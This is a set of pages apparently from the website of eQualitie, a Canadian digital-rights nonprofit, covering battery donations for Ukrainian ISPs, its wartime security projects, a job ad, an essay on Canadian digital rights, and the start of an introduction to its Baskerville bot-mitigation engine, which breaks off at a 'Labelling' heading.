No posts were found with the criteria specified. Try searching again.
Donate to Keep Ukrainians online
Since October 2022, Russia has been targeting critical civilian infrastructure in Ukraine with its missiles and drones. Attacks have degraded electricity generation and distribution, cutting off power and thereby heating, water treatment and Internet connectivity for millions of people. Rolling electricity blackouts lasting anywhere from several hours to days are making this brutal conflict even harsher. Even if the war was to stop tomorrow, damage to electricity power plants and distribution networks will persist. One of the ways eQualitie is responding to this crises is by supplying small Internet service providers (ISP) with batteries to help them power their local (fibre optic) networks during electricity outages. We have already delivered a 7 tonne shipment in December.
The donated batteries have been in use since December 2022. Chernihiv, the regional center located in northern Ukraine, was almost surrendered by the Russian military since the first days of aggression. City infrastructure has been heavily destroyed due to constant bombardments. Even during the combat in Feb-March ISP Osnova had provided internet and cable TV services to more than 50 thousand households in Chernihiv. Dmytro Samsonenko, the director of ISP Osnova, shares his feedback on the usage of donated batteries during outages:
Our SBL batteries are connected to the EASUN ISOLAR-SMG-II-3.6KW-WIFI inverter, the system capacity is approximately 3 kWh (135 Ah at 24 V).
The system is installed at the district-level node, which provides television and internet connection for 185 residential buildings in Chernihiv. The capacity of the batteries is enough for 16 hours of continuous operation of the equipment in the event of an outage of the node.
WE NEED YOUR CONTRIBUTION TO SEND A SECOND DELIVERY !
Please make a donation today to support this procurement. Our goal is to collect $25 000, which will help to buy 150-170 individual batteries to serve the needs of around 30 ISPs. All contribution matters! More than 1500 ISPs work in Ukraine, this market is diverse and the smallest ISPs provide services to a few residential buildings. Thus, the need for batteries remains high.
100% of your donation will go towards the batteries’ purchase. We have an established logistics pipeline with DACPOL and customs importing and road freight assistance from DEPS. In Ukraine, the Ministry of Digital Transformation works with local ISPs on delivery, verification and reporting.
Donate now!
Please, fill in the form needed for donation
We also accept donations in BTC: bc1qre02fd4w6nvl7eq44456z03h25fvnuzjms28p9
eQualitie Org is a Canadian registered non profit corporation (1191545-2) with business number 745963470RC0001
Donate to Keep Ukrainians online
Since October 2022, Russia has been targeting critical civilian infrastructure in Ukraine with its missiles and drones. Attacks have degraded electricity generation and distribution, cutting off power and thereby heating, water treatment and Internet connectivity for millions of people. Rolling electricity blackouts lasting anywhere from several hours to days are making this brutal conflict even harsher. Even if the war was to stop tomorrow, damage to electricity power plants and distribution networks will persist.
One of the ways eQualitie is responding to this crises is by supplying small Internet service providers (ISP) with batteries to help them power their local (fibre optic) networks during electricity outages. We have already delivered a 7 tonne shipment in December and are now fundraising for a second delivery. We invite you to make a donation below to support this procurement. Our goal is to collect $25 000, which will help to buy 150-170 individual batteries to serve the needs of around 30 ISPs. All contribution matters!
100% of your donation will go towards the batteries’ purchase. We have an established logistics pipeline with DACPOL and customs importing and road freight assistance from DEPS. In Ukraine, the Ministry of Digital Transformation works with local ISPs on delivery, verification and reporting.
WAYS TO DONATE TO KEEP UKRAINIANS ONLINE
Credit Card (using STRIPE) donation
BTC: bc1qre02fd4w6nvl7eq44456z03h25fvnuzjms28p9
eQualitie Org is a Canadian registered non profit corporation (1191545-2) with business number 745963470RC0001
Thank you, in advance!
A year in review: eQualitie’s reactions to the war in Ukraine
Since the beginning of the second invasion in February 2022, eQualitie has launched a series of rapid efforts focusing on digital security capacity building and urgent response to various communication and safety needs of Ukrainian citizens, media agencies, human rights organizations, and CSOs. A lot of the focus of our existing programming on web security and censorship circumvention was extended to the realities and needs of Ukrainian websites and people finding themselves in temporarily occupied territories (and part of the Russian Internet). Herein a brief summary of the work done in 2022 to help defend Ukrainians during this illegal invasion.
The Digital Security Helpline Nadiyno.org was conceived in late spring and launched in partnership with Internews Ukraine in November. It is the first national digital security helpline in Ukraine (and possibly the world) tasked with responding to any and all questions from the public relating to cyber security. The rational behind the helpline was to offer immediate and easy to understand solutions for the many problems and questions people have in relation to their device and communications safety. By and large most of them cannot afford the time and mental space to reading long manuals and attending webinars in order to understand the whole security landscape. They just need answers and in a war-time setting these answers often have a direct impact on their personal well-being and safety. We assembled and trained a dedicated team of helpline support staff and digital experts, stood up systems to document and respond to incoming requests and compiled a growing database of security FAQs on the Nadiyno website.

Nadiyno.org launch event, with Internews, eQualitie and Ministry of Digital Transformation. November 2022
We have also conducted eight digital security webinars reaching 1027 participants, including 202 civil servants from the Cabinet of Ministers of Ukraine (the central body of the Ukrainian Government). Civil servants participated in two tailored webinars by eQualitie on the basics of digital security and the identification of phishing attacks, one of the major cyber threats against individuals in Ukraine.
In the first weeks of the conflict, eQualitie launched a decentralized communications network in Ukraine https://dcomm.net.ua to support local area emergency communications in the case of Internet shutdowns caused by military activity. A federated network of 10 servers was set up in 9 Ukrainian cities: Kyiv, Kharkiv, Odesa, Rivne, Lviv, Kherson, Mykolaiv, Poltava, and Khmelnytskyi enabling secure chat for Ukrainian users using the Matrix/Element platform and micro-blogging on the Mastodon social network. eQualitie published several easy-to-follow guides on using these new services in Ukrainian and introduced content moderation and network administration capacity to ensure smooth operations in a very difficult climate.
As of December 2022, more than 1100 users are running their own instances of Mastodon on this platform to communicate with each other and millions of other users from hundreds of federated instances worldwide. The Kyiv instance https://social.kyiv.dcomm.net.ua/ is already the second biggest Mastodon platform in Ukraine. Hundreds of rooms and thousands of users are communicating on the Matrix network everyday.
eQualitie protects over a hundred Ukrainian media and CSO websites from DDoS attacks on the Deflect network. Since the beginning of the conflict, an additional 60 Ukrainian websites have been onboarded, bringing a daily audience of over half a million people Ukraine. Deflect protects the websites of key Ukrainian human rights organizations, including the 2022 Nobel prize laureate – the Center for Civil Liberties.
The eQualitie team mitigates DDoS attacks against Ukrainian websites on a daily basis. Ukrainian newsrooms which provide quality reports on the Russia-initiated war against Ukraine become frequent targets of DDoS. One of the regional newsrooms from Zhytomyr, onboarded to Deflect in Aug 2022, has witnessed over twenty significant attacks since then. In just three days between October 27-30, attackers generated 33,3 million malicious hits against the website, albeit to no effect.
The Censorship.no project from eQualitie helps users in temporarily occupied territories to circumvent Internet censorship – part and parcel of Russia’s occupation is that local networks have been re-routed to join the Runet – where website blocking and traffic surveillance is rife. Using the CENO browser, which works using BitTorrent protocols, users can circumvent local network filtering and share contents of retrieved web pages with each other. More than 20 thousand Ukrainian users installed CENO on their Android devices via Google Play market.
In December, eQualitie, in partnership with the Ministry of Digital Transformation of Ukraine, DEP, and the Association of “Right Owners and Providers of Content”, supplied 29 Ukrainian ISPs with 172 SBL 135-12HR batteries to power the providers’ fibre optic network during power outages. This batch with a total capacity of 20,640 Amps or 247 kWh as a cargo weighing 6,600 kg was delivered to Ukraine and distributed among local ISPs based on the need assessment, conducted by the Ministry and eQualitie. More information in our previous post.
These actions are but a small drop in the ocean of foreign support offered and still needed to sustain the Ukrainian people through the arduous and violent conflict inflicted upon them. A lot more work remains to be done in 2023 and we aim to continue the pace and breadth our interventions. This project is realized with support from Global Affairs Canada and the Canadian tax payers.
You can download a presentation of our Ukrainian focused projects here or check out the video presentation given at the International Cyber-security Forum (FIC) 2022 in Montreal.
Keeping Ukrainians online during electricity outages
Montreal, Canada
December 26, 2022
Press release
Canadian support from eQualitie allows hundreds of thousands of Internet users in Ukraine to stay connected
Canadian Technology Organization eQualitie, in partnership with the Ministry of Digital Transformation of Ukraine, DEPS UA, and the Association of “Right Owners and Providers of Content”, supplied 29 Ukrainian ISPs with 172 SBL 135-12HR batteries to power the providers’ fiber optic network during power outages.
A cargo weighing 6,600 kg as humanitarian aid arrived in Ukraine from Poland, where eQualitie purchased a series of batteries donated for Ukrainian ISPs. Each battery weighing 38 kg will be installed on the fibre optic and distribution networks of local Internet providers, allowing them to power their networks for an additional 10-12 hours through the electricity outages. This batch of donations has a total capacity of 20,640 Amps or 247 kWh. – helping more Ukrainians access the Internet without interruption.
Distribution of batteries is based on a needs assessment conducted by eQualitie together with the Ministry of Digital Transformation of Ukraine. The stated needs were to bring batteries for regions most affected by Russian aggression – Chernihiv, Kyiv, Kharkiv, Donetsk, Zhytomyr, Sumy, etc.
This support became possible due to the efforts and commitments of the Canadian government, taking place within the framework of the project “Digital Emergency Support of Civil Society in Ukraine”, implemented by eQualitie together with the NGO “Internews Ukraine”. Internet Service Providers are among the project’s key recipients, – supporting their efforts in providing Internet and communication services to the public.
Whilst the Ukrainian Internet has shown great resilience during this conflict, it is essentially another civic utility reliant on electricity. Internet access has provided a communications and an information lifeline for so many over the last eleven months. In the conditions of constant Russian shelling of the critical infrastructure of Ukraine, and as a result – power outages, the work of providers becomes even more difficult. We note the significant efforts of Ukrainian providers to restore the infrastructure damaged during the war in order and hope that our small contribution will allow hundreds of thousands of people get reliable access to the Internet” – notes Dmitri Vitaliev, eQualitie’s director.
With the first shipment of batteries, eQualitie joins the international campaign “Keep Ukraine Connected” by NOG Alliance as an initiative of international assistance with equipment for Ukrainian ISPs. In January, eQualitie plans to purchase and bring additional batteries to Ukraine.
Beyond the supply of batteries, in Ukraine eQualitie protects the websites of Ukrainian media and CSOs from DDoS attacks by means of its own infrastructure called Deflect.ca. Also, the organization helps users in the temporarily occupied territories access a free Internet, with the CENO browser software, an Android application that helps them evade Russian censorship. At the very beginning of the conflict, eQualitie launched a decentralized communications project in Ukraine https://dcomm.net.ua/ with 10 regional locations for Ukrainian users to chat using the secure Matrix system and communicate on the Mastodon social network.
For media inquiries, please, contact Vitalii Moroz at vitaliy@equalitie.org
eQualitie creates decentralized internet services in support of a more equal and equitable network. Our solutions are open source, battle proven and developed in mind of our principles. Everyday, they enable freedom of association for millions of people online.
Regional ambassadors for CENO & Deflect
- Start Date: asap
- Job Location: Remote
- Job Type: Results based compensation
eQualitie creates decentralized internet services in support of a more equal and equitable network. Our solutions are free, open source, battle proven and developed in mind of our principles. Everyday, they enable freedom of association for millions of people online.
We are looking for informed and motivated individuals to promote our tools and services to local media, civil society, democratic movements and activist organizations. You will help us define and lead outreach strategies in your country/ies of focus, offer onboarding support and help users coordinate with our helpdesks. In turn, you will receive training on the given tools and services. We are looking for regional ambassadors from the 2023 priority list (see below).
eQualitie’s products for outreach and adoption
Deflect.ca – is a global website security infrastructure, protecting over a thousand civil society and media websites. Over 20 million people read Deflect protected websites every month. Powered by optional WordPress hosting and our enterprise level AI engine, Deflect boasts a 99.99% network up-time. We have offered continuous support over 11 years to some of the most targeted voices online – against cyber criminals and state
actors with huge cyber-offensive resources. Deflect protection includes distributed denial of service attacks, password brute force, vulnerability scanning, malicious code injections, social engineering and legal attacks, among others. Deflect investigations have helped activists around the world in their advocacy efforts, exposing adversarial methods and their ambitions. Already offered in five languages, we will add Portuguese, French, Turkish, Arabic, Urdu, Spanish in 2023 to facilitate service.
Censorship.no (CENO Browser) is an Android web browser, similar to Firefox or Chrome. It is designed to circumvent Internet censorship and can continue to serve website content during Internet shutdowns. CENO is easier to install and use than a VPN, and harder for the authorities to block. When a web page is retrieved by a user, it is stored on their device and continues to be shared inside the country with other users, using our peer-to-peer technology. CENO automatically cycles through several methods for connecting to a website, choosing the fastest option available based on network conditions, censorship and the state of the distributed caching network.
eQualitie can further seed the peer-to-peer network with static copies of entire websites – making every one of their web pages easily available through the CENO browser even if the original resource is no longer online or accessible. CENO has been actively deployed around the world with strong usage across Myanmar, Ukraine, Russia, Iran and India. It has proven itself to work during network shutdowns in these areas.
Job Description
For Deflect:
- Lead outreach and information campaigns on cyber attacks and Deflect protection services
- Support the onboarding process for eligible users and solicit frequent feedback to ensure smooth
operations and client satisfaction
For CENO:
- Promote the usage of CENO Browser in your country, including by designing and implementing
educational outreach materials and campaigns - Solicit feedback from users and conduct occasional feedback surveys; find volunteers for testing CENO
and coordinate with our software team on results - Recruit important media outlets for continuous accessibility to CENO users
About you:
- Good knowledge of civil society and independent media organizations in one or more countries from the list below;
- Strong English writing and reading skills;
- Experience with using Internet technologies and be quick to learn new software;
- An understanding of Internet censorship and how it impacts media and social movements;
- WIFI Internet access and cellular connection plan; an Android Phone.
How to apply :
Write to us including your resume and a cover letter explaining how your experience and motivation match our requirements. Don’t forget to mention your languages and countries of interest!
______________________________________________________________________________
Priority language groups and regions for 2023
Portuguese
- Angola
- Brazil
- Mozambique
- Timor Leste
Spanish
- Bolivia
- Colombia
- Ecuador
- Guatemala
- Honduras
- Nicaragua
- Venezuela
English
- Tanzania
- Zimbabwe
- Uganda
- Zambia
Arabic
- Iraq
Urdu
- Pakistan
Turkish and/or Azerbaijani
- Azerbaijan
- Turkey
Farsi
- Afghanistan
- Iran
French
- Djibouti
- DR Congo
- Mali
Russian
- Belarus
- Russia
Apply to join our regional ambassadors promoting eQualitie’s Internet freedom services
We are looking for informed and motivated individuals to promote our censorship circumvention tools and website protection services to local media, civil society, democratic movements and activist organizations. You will help us define and lead outreach strategies in your country/ies of focus, offer onboarding support and coordinate with our helpdesks. In turn, you will receive training on the given tools and services and join our growing team of internet freedom advocates. We are looking for regional ambassadors from the 2023 priority list. See the job advertisement for more detail and application form.
______________________________________________________________________________
Priority language groups and regions for 2023
Portuguese
- Angola
- Brazil
- Mozambique
- Timor Leste
Spanish
- Bolivia
- Colombia
- Ecuador
- Guatemala
- Honduras
- Nicaragua
- Venezuela
English
- Tanzania
- Zimbabwe
- Uganda
- Zambia
Arabic
- Iraq
Urdu
- Pakistan
Turkish and/or Azerbaijani
- Azerbaijan
- Turkey
Farsi
- Afghanistan
- Iran
French
- Djibouti
- DR Congo
- Mali
Russian
- Belarus
- Russia
The need for a broad-based digital rights movement in Canada
By Michel Lambert
Introduction
On 8 February 2022, almost two years into the pandemic, two important political events happened in Canada. For the first time, a member of the federal parliament, Joel Lightbound, who is also from Prime Minister Justin Trudeau’s Liberal Party of Canada, spoke out publicly on the government’s COVID-19 policies, saying they had become “politicised” and “divisive”. His political future was at stake for a few weeks.
The same day, as infection rates from the fifth wave appeared to be declining in his province, the premier of Quebec, François Legault, declared that most restrictions would be removed within the following month. However, two major policies would remain in effect: the vaccine passport – an application on mobile phones necessary for every individual to have access to stores and services – and the state of emergency which allows the government to run affairs without using the usual political institutions.
These two separate events demonstrate how the federal and provincial governments have kept tight control over the management and messaging of the COVID-19 pandemic, and wish to carry on doing so, including by disallowing debates on their policies and stifling any divergent viewpoints.
Signs that the government wants more control
Vaccine passports
In Quebec, where 81% of the population has received two vaccines already, and where this rate is still growing daily, insisting on the vaccine passport is inexplicable other than by the government’s interest in continuing to track people. The Quebec National Institute for Public Health in Quebec (Institut national de santé publique du Québec) has even recently admitted that they have no proof of the efficiency of the passport. Many technical weaknesses with the passport application have also been exposed. As of January 2022, more than 150 investigations into fake passports were opened, with guilty people facing fraud charges and up to five years in prison.
Mass surveillance
In December 2021, the Canadian public health agency admitted to having tracked 33 million mobile devices during the lockdown that year. To do so, they awarded a contract to the Telus Data for Good programme,1 a programme launched by the Telus telecommunications company, claiming to help “solve pressing societal issues in ways that preserve privacy and build trust.” The irony of that situation has made the public realise that there are few regulations that act as safeguards in protecting privacy in Canada. As a result, local NGOs have started to request that the government introduce new laws that would create rules around how public bodies report on the collection and use of sensitive personal information, and provide oversight from an independent third party, like the Office of the Privacy Commissioner of Canada.
New laws to control Canadians – and no law to protect them
At the federal level, while disinformation and misinformation existed before COVID-19, the pandemic has spawned two ambitious and very dangerous draft laws looking at controlling what is accessible to Canadians over the internet from almost all online services, as well as controlling what Canadians publish online.
In November 2020, the government introduced Bill C-10, followed in June 2021 by Bill C-36.
Bill C-10, called the “censorship bill” by many, was initially presented as a way of generating new taxes for streaming services. It was rapidly sent to the senate after a gag order was placed on the committee studying it. Instead of simply taxing streaming services, critics found that the bill would amend the Canadian Broadcasting Act and grant utterly inappropriate power to one institution, the Canadian Radio-television and Telecommunications Commission (CRTC). It would have the power to decide which audiovisual content is available on the internet. The bill’s adoption was delayed because of the Canadian elections in September 2021. It was, however, reintroduced as Bill C-11 in February 2022.
Despite government promises of a less aggressive version, the second version of the bill still gives a limitless reach to the CRTC’s jurisdictional power over audiovisual services on the internet. An internal memo from the government2 identified a wide range of sites and services, including video streaming, podcast apps, audiobooks, home workout apps and adult and sport websites potentially covered by the legislation. Michael Geist, a well-known researcher from the University of Ottawa, believes that this may result in many services choosing to block the Canadian market3 entirely.
Bill C-36 was presented in June 2021 to fight online hate speech. It would have amended the Canadian Criminal Code, the Youth Criminal Justice Act and the Canadian Human Rights Act to allow individuals or groups to file hate speech complaints with the Canadian Human Rights Commission. Critics said it was fraught with problems and risked hampering freedom of speech on top of being difficult to enforce.
Between July and September 2021, the Canadian Heritage Ministry consulted interested parties on the proposed bill. While the majority of respondents consulted during this process confirmed the need to take action on the problem of hate speech, they also identified several overarching concerns, including those related to freedom of expression, privacy rights, the impact of the proposal on certain marginalised groups, and compliance with the Canadian Charter of Rights and Freedoms.4
Civil society has caught “long COVID”
These threats to civil freedoms coming from the national and provincial level have seriously affected political life in Canada, and particularly in provinces like Quebec. Mainstream media have completely abdicated their role of being a watchdog to power, and have reduced themselves to just being transmission channels for government decisions on the pandemic. Journalists who dared to question those policies were fired. The most recent example is Francine Pelletier, a well-known journalist from the newspaper Le Devoir in Montreal who dared to write an article questioning the government’s policy of prioritising vaccination over other possible interventions in its strategy for combatting the virus in January 2022. She was fired a week later.
As governments are managing the pandemic outside of the normal institutions and parameters, political parties have been reduced to observers, hardly criticising the footnotes from government policies that are introduced.
Maybe most of all, civil society organisations have slowly slipped into a state of dormancy – a kind of long COVID. As many of the global campaigns and movements – against climate change, racism, gender-based violence, war and others – were suddenly paused due to the pandemic, many local organisations lost contact with a global perspective. They were trapped into managing immediate difficulties, including financial difficulties, and were struggling to maintain democratic structures online and to reflect and act on pressing political issues. Added to this is the absence of a substantial, critical and alternative vision that is not aligned with the idea that the virus is a conspiracy and that it does not exist. Civil society had its TINA5 – or “there is no alternative” – moment. This has resulted in a real inability to debate alternative political perspectives from a factual point of view, and to create alternative, meaningful strategies that safeguard human rights.
The future of digital rights advocacy
Canadian digital rights advocacy can be defined in many ways, but in particular by the obvious characteristic that there are far fewer actors in the actual movement than the number of people and organisations that really should be concerned by the development of such a broad-scope tool as the internet. This might be explained by the fact that the Canadian Internet Governance Forum (IGF) process is very young (it was first funded in 2019) and fragmented (a Quebec Provincial IGF also exists, but the two processes are still not formally connected), and possibly by a certain conviction held by many that the internet in Canada is “safe and secure”, here to stay, relatively easy to access, and somehow self-managed. In comparison to other human rights movements in Canada, digital rights organisations can be quite specialised, not always successfully connecting with the “offline” rights movements or any other civil society group concerned about the internet.
It is also fair to say that the digital rights organisations could be better connected to each other, learn more from each others’ work, and cooperate more on campaigns. While Canadian community-based campaigns working on many issues are often federated in associations, giving weight to their advocacy, this is not the case in the field of digital rights. For instance, when ethical hackers easily infiltrated the COVID vaccination app in Quebec, and pointed out the app’s weaknesses to the government, they were immediately labelled as anti-government and threatened with judicial proceedings, but hardly any organisation stood up to support them.
Digital rights organisations are probably not spending enough of their resources on educating other organisations or their constituents about the importance and challenges of digital rights. A study[1]6 by Lab-Delta, a Montreal-based group doing research on technology and activism, concluded after interviewing university students that even when people assume and pretend that they understand digital rights issues, the majority of them do not. This lack of understanding of the issues is one reason why it is difficult to connect digital rights movements meaningfully to other societal concerns, and also shows the huge need to educate the public on digital rights issues.
However, there is only so much digital rights organisations can do. Their resources are limited, and most of them are currently spent on engaging the government on policy and legislation, as was clear from the last two roundtables held at the Canadian IGF. While there were many recommendations, they were all directed at what the government should do.
Conclusion
I would argue that there has been more of a pause than a real shift in digital rights advocacy in Canada as a result of the pandemic. Central issues facing the movement, namely the lack of networking inside and outside the movement, and the lack of public education, were realities prior to March 2020, and are likely to persist in the near future.
Even the two new federal laws, C-11 and C-36, were already planned, at least as far as government intentions go, as early as 2019. The scope they initially chose to give to these bills was boosted by the sudden need to counter COVID disinformation, which was not expected, but a mandate letter to the Canadian Heritage Minister in December 2019[2]7 already mentioned the government’s plans to create new regulations for social media platforms, requiring them and internet service providers (ISPs) to remove “illegal content”, including hate speech.
Footnotes
[1] Couture, S., et al. (2021). Stratégies d’engagement pour et par le numérique. Lab-Delta. https://www.labdelta.ca/publications/strategies-dengagement-pour-et-par-le-numerique
[2] https://pm.gc.ca/en/mandate-letters/2019/12/13/archived-minister-canadian-heritage-mandate-letter
Notes
This report was originally published as part of a larger compilation: “Global Information Society Watch 2021-2022”
Creative Commons Attribution 4.0 International (CC BY 4.0) – Some rights reserved.
Global Information Society Watch 20121-2022 – print
ISBN 978-92-95113-53-4
APC Serial: APC-202211-CIPP-R-EN-P-343
Global Information Society Watch 2021-2022 web and e-book
ISBN 978-92-95113-52-7
APC Serial: APC-202211-CIPP-R-EN-DIGITAL-342
Launching the Ukrainian digital security helpline – Nadiyno
On 8th of November 2022, eQualitie and Internews Ukraine are launching nadiyno.org – the first national digital security helpline in Ukraine, for responding to any and all questions from the public relating to cyber security. We have assembled and trained a dedicated team of helpline support staff and digital experts, stood up systems to document and respond to incoming requests and compiled a growing database of security FAQs on the Nadiyno website. Requests are accepted and replied to using email, web chat, WhatsApp, Signal, Telegram, and on a Matrix channel.
During wartime, people are under incredible psychological and physical stress. Secure and unimpeded use of digital technology and services, in particular communications, are an essential public need and frequently a lifeline to those in distress. With support from Global Affairs Canada we are launching the Nadiyno helpline for all Ukrainians’ digital security questions. – Dmitri Vitaliev, director of eQualitie.
Please see the announcement from Internews Ukraine for more information on the public launch event in Kyiv. If you would like to aid or contribute to the effort, please contact Kateryna – ktsybenko(at)internews.ua
eQualitie launches CENO, world’s first decentralized p2p mobile browser
CENO Browser lets anyone access and share information in areas with censored communications
Montreal, May 10, 2022 – eQualitie, developer of open-source and reusable digital security systems, is pleased to announce the public launch of its newest democratization tool, CENO Browser. Short for censorship.no, CENO is the world’s first mobile browser that is built specifically to side-step current Internet censorship methods. It also enables people to access and share information in and across regions where connectivity has been interrupted or compromised.
CENO uses established technologies in new ways. While the user experience is akin to using a standard mobile browser, CENO operates over a peer-to-peer (p2p) network on the open-source Ouinet library and BitTorrent protocols, allowing it to run reliably where other browsers might not or do not. Because the web content is delivered, cached and decentralized via p2p routing, it cannot be forcibly removed by external agents. Furthermore, CENO is equipped to access and share cached content offline and via local area networks (LANs). CENO’s resiliency makes it ideal for those who need stable access to and sharing capabilities of web information during media censorship events, filtering, attacks, shutdowns, natural disruptions, unrest, conflict and war. CENO’s routing and distribution can also significantly reduce bandwidth consumption and associated costs.
“CENO holds great promise and launches at an opportune time for those engaged in democracy movements and activities,” says Dmitri Vitaliev, founder and director of eQualitie. “It is already helping thousands of civilians, NGOs, investigative journalists and independent media internationally to share information on their mobile devices.”
View the press release in full
Download CENO Browser from the Playstore
The Censorship.no project on Github
eQualitie’s position on the war in Ukraine
український / русский / english / français /
Oh bury me, then rise ye up
And break your heavy chains
And water with the tyrants’ blood
The freedom you have gained.
And in the great new family,
The family of the free,
With softly spoken, kindly word
Remember also me.
Testament, Taras Shevchenko, 1845
(translated by John Weir)
For ten years eQualitie has stood firmly in defence of digital human rights. Throughout this time, we strive to create technology and offer services that protect freedom of expression and association online. To help us stay balanced in achieving this mission we have purposely stayed out of politics, debates or public declarations.
But, as the Russian army is invading and destroying Ukrainian cities, killing innocent civilians and hiding the truth from its own population – we choose to stand with Ukrainians who are defending their homes and families. We mourn the lives already lost and the destruction of Ukrainian cities and its cultural heritage. We also choose to stand with Russian anti-war protesters , arrested in their thousands for trying to stop the annihilation of morality in their country. This is an international struggle for human dignity, freedom and the right to life.
To this effect, we have launched technical and capacity building efforts focused on supporting Ukrainian civil society and territorial defences, as well as supporting activities in Russia that preserve online communities and those challenging the war efforts. Some of this work has already begun:
- Emergency communications network in Ukraine https://dcomm.net.ua
- Decentralized communications network in Russia https://start.chatv3.ru
- Technical and financial assistance to Ukrainian ISPs
- Digital security training and capacity building for Ukrainian civil society and civic territorial defence forces
- Free website protection and hosting for any Ukrainian civil society, humanitarian or business organization
Why now? Simply because maintaining our neutrality will not sufficiently address the injustice and undue suffering caused by the Russian government and army on the people of Ukraine.
We believe that Ukraine will win, their people will rise from the ashes of this conflict, stronger in spirit and solidarity. And we will make every effort to help them in this struggle!
trainers meetup
11 друзей тренера
Привет! Мы хотим устроить онлайн-встречу и поделиться с вами нашими находками и конкретными предложениями финансовой и технической поддержки вашей тренерской работы. Мы хотим вместе с вами обсудить то, на что обычно не хватает времени, например:
Откуда берутся стратегии и методы, и как работают? Чем разные тренерские подходы отличаются друг от друга? Как и в каких обстоятельствах их уместно использовать — и как и кому они помогают сегодня?
то мы можем сделать прямо сейчас, чтобы помочь тренерам? В каких формах мы можем хранить и распространять методологии и гайдлайны? Как обеспечить более эффективную коммуникацию, обмен навыками и знаниями в тренерских сообществах?
В каком виде мы оставим наши наработки следующему поколению тренеров?
И как переосмыслить форматы тренингов в период пандемии? Какие мероприятия нужны тренерскому сообществу?
Также в рамках подготовки к сессиям, посвященным тренерским пособиями и локализации материалов, мы просим вас собрать ссылки на:
– один успешный и один неудачный с вашей точки зрения пример методички (и подумать о критериях “успешности”);
– несколько материалов, которые вы считаете нужным локализовать на ваш рабочий язык.
Заполните, пожалуйста, эту форму. Это поможет нам не тратить ваше время впустую и поговорить о действительно важном.
Deflect survey
Thank you!
For a decade, eQualitie has been researching and developing advanced and ethical online security technologies. So far, we have been offering our technologies exclusively to civil society organizations like yours, who share our values and vision of an open, secure and private Internet. Protecting you and your cause is, after all, our original and ongoing mission. Together, we have built amazing technologies and, most of all, a network of human and machine drive intelligence, working to proactively eliminate threats to the free circulation of contents and ideas on the internet.
The next step
We have been protecting millions of daily interactions between organizations like yours and their communities. We believe that the next step is to offer some of our technologies to the millions of private companies, who also want to join the movement.
We believe we are currently one of the few truly independent and transparent developers and operators of a viable, tested and mature technology suite for ensuring website availability. We believe there is a niche for us, a “blue sea” where our services and values will be useful.
We need your help
As you know, it is fundamental for any provider to identify their strengths and find the right “pitch” for the offering.
- We need to validate our assets with you, confirm why you appreciate Deflect services.
- We also need to understand the decision process of leaders, regarding their online security. Find out when and how we can position ourselves in clients’ decision process.
We would greatly appreciate a few minutes of your time to answer this simple survey. No pressure, but the future of affordable and ethical internet security may depend on it :)
Bot mitigation
Baskerville is an analytics engine that leverages machine learning to distinguish between normal and abnormal web traffic behavior. It is currently in production on the Deflect network, as a web application firewall, working in coordination with the Challenger and Banjax tools. Baskerville was created to help our systems team identify and block malicious bots attacking our clients’ websites. Its primary functionality was built around the following needs:
- Be fast enough to make it count
- Be able to adapt to changing traffic patterns
- Provide actionable intelligence (a prediction and a score for every IP)
- Provide reliable predictions (probation period & feedback)
Baskerville is also an open source project and can be installed in any web environment. In the near future, Baskerville will become a clearinghouse of threat intelligence and will allow anyone to query our machine model for identifying malicious traffic on their networks. Read more about the project below.
Introducing Baskerville (waf!)
The more outré and grotesque an incident is the more carefully it deserves to be examined.
― Arthur Conan Doyle, The Hound of the Baskervilles
Chapter 1 – Baskerville
Baskerville is a machine operating on the Deflect network that protects sites from hounding, malicious bots. It’s also an open source project that, in time, will be able to reduce bad behaviour on your networks too. Baskerville responds to web traffic, analyzing requests in real-time, and challenging those acting suspiciously. A few months ago, Baskerville passed an important milestone – making its own decisions on traffic deemed anomalous. The quality of these decisions (recall) is high and Baskerville has already successfully mitigated many sophisticated real-life attacks.
We’ve trained Baskerville to recognize what legitimate traffic on our network looks like, and how to distinguish it from malicious requests attempting to disrupt our clients’ websites. Baskerville has turned out to be very handy for mitigating DDoS attacks, and for correctly classifying other types of malicious behaviour.
Baskerville is an important contribution to the world of online security – where solid web defences are usually the domain of proprietary software companies or complicated manual rule-sets. The ever-changing nature and patterns of attacks makes their mitigation a continuous process of adaptation. This is why we’ve trained a machine how to recognize and respond to anomalous traffic. Our plans for Baskerville’s future will enable plug-and-play installation in most web environments and privacy-respecting exchange of threat intelligence data between your server and the Baskerville clearinghouse.
Chapter 2 – Background
Web attacks are a threat to democratic voices on the Internet. Botnets deploy an arsenal of methods, including brute force password login, vulnerability scanning, and DDoS attacks, to overwhelm a platform’s hosting resources and defences, or to wreak financial damage on the website’s owners. Attacks become a form of punishment, intimidation, and most importantly, censorship, whether through direct denial of access to an Internet resource or by instilling fear among the publishers. Much of the development to-date in anomaly detection and mitigation of malicious network traffic has been closed source and proprietary. These silo-ed approaches are limiting when dealing with constantly changing variables. They are also quite expensive to set-up, with a company’s costs often offset by the sale or trade of threat intelligence gathered on the client’s network, something Deflect does not do or encourage.
Since 2010, the Deflect project has protected hundreds of civil society and independent media websites from web attacks, processing over a billion monthly website requests from humans and bots. We are now bringing internally developed mitigation tooling to a wider audience, improving network defences for freedom of expression and association on the internet.
Baskerville was developed over three years by eQualitie’s dedicated team of machine learning experts. Several challenges or ambitions were presented to the team. To make this an effective solution to the ever-growing need for humans to perform constant network monitoring, and the never-ending need to create rules to ban newly discovered malicious network behaviour, Baskerville had to:
- Be fast enough to make it count
- Be able to adapt to changing traffic patterns
- Provide actionable intelligence (a prediction and a score for every IP)
- Provide reliable predictions (probation period & feedback)
Baskerville works by analyzing HTTP traffic bound for your website, monitoring the proportion of legitimate vs anomalous traffic. On the Deflect network, it will trigger a Turing challenge to an IP address behaving suspiciously, thereafter confirming whether a real person or a bot is sending us requests.
Chapter 3 – Baskerville Learns
To detect new evolving threats, Baskerville uses the unsupervised anomaly detection algorithm Isolation Forest. The majority of anomaly detection algorithms construct a profile of normal instances, then classify instances that do not conform to the normal profile as anomalies. The main problem with this approach is that the model is optimized to detect normal instances, but not optimized to detect anomalies causing either too many false alarms or too few anomalies. In contrast, Isolation Forest explicitly isolates anomalies rather than profiling normal instances. This method is based on a simple assumption: ‘Anomalies are few, and they are different’. In addition, the Isolation Forest algorithm does not require a training set to contain normal instances only. Moreover, the algorithm performs even better if the training set contains some anomalies, or attack incidents in our case. This enables us to re-train the model regularly on all the recent traffic without any labeling procedure in order to adapt to the changing patterns.
Labelling
